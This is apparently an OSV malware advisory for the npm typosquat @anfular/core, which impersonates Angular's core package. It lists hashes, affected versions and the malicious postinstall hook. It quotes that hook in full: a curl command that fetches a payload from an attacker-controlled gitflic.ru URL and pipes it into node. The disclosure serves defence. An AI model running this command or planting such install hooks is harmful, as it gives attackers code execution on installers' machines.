MAL-2026-17533

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@anfular/core/MAL-2026-17533.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-17533
Published
2026-10-05T03:31:11Z
Modified
2026-10-05T04:15:04Z
Summary
Malicious code in @anfular/core (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (eefc706854c122c96c898da5d4db285f26e31430f25451e5d1073a31db5e5341)

Package @anfular/core@22.2.1 is a one-character typosquat of @angular/core, with manifest fields impersonating the official Angular package (scope @anfular, description 'Angular - the core framework', author 'angular', repository pointing at github.com/angular/angular). The package.json postinstall script runs 'curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node', downloading an unpinned JavaScript payload from an attacker-controlled gitflic.ru URL (fronted by a web.archive.org wrapper) and piping it directly into node for execution on the installer's machine at npm install time. The fetched code is unverified, unpinned, hosted off any official registry or publisher-matched domain, and executed with the installer's privileges, giving the author arbitrary code execution on every machine that installs the package.

Database specific
{
    "malicious-packages-origins":  [
        {
            "id":  "IN-MAL-2026-020986",
            "import_time":  "2026-10-05T03:57:36.791604096Z",
            "modified_time":  "2026-10-05T03:31:11Z",
            "sha256":  "eefc706854c122c96c898da5d4db285f26e31430f25451e5d1073a31db5e5341",
            "source":  "amazon-inspector",
            "versions":  [
                "22.2.1"
            ]
        }
    ]
}
References
Credits

Affected packages

npm / @anfular/core

Package

Name
@anfular/core
View open source insights on deps.dev
Purl
pkg:npm/%40anfular/core

Affected ranges

Affected versions

22.*
22.2.1

Database specific

cwes
[
    {
        "cweId":  "CWE-506",
        "description":  "The product contains code that appears to be malicious in nature.",
        "name":  "Embedded Malicious Code"
    }
]
indicators
{
    "evidence_files":  [
        {
            "path":  "package.json",
            "sha256":  "ce6cd462b1a8b46101f014a562fc2fc16173f60e46f746246caef8522b2c106d",
            "tlsh":  "29513724e4f48d6323df6254dd2a4943b139495b5c38bd68b3dd009c8f0e61f21beb9a"
        }
    ],
    "package_integrity":  [
        {
            "filename":  "core-22.2.1.tgz",
            "hashes":  {
                "sha1":  "60af1dec16f6b1e397442c8ee6da31a06928de95",
                "sha512_sri":  "sha512-Xg6Nwt8z4Zx1AzB/DAvf2DQpyUfqIY1rFC1uNMg/Ht+7M3+3Xp2VvQSr8VpnFwrLHkTEz6uuqzR8jG3Lu/cfbQ=="
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@anfular/core/MAL-2026-17533.json"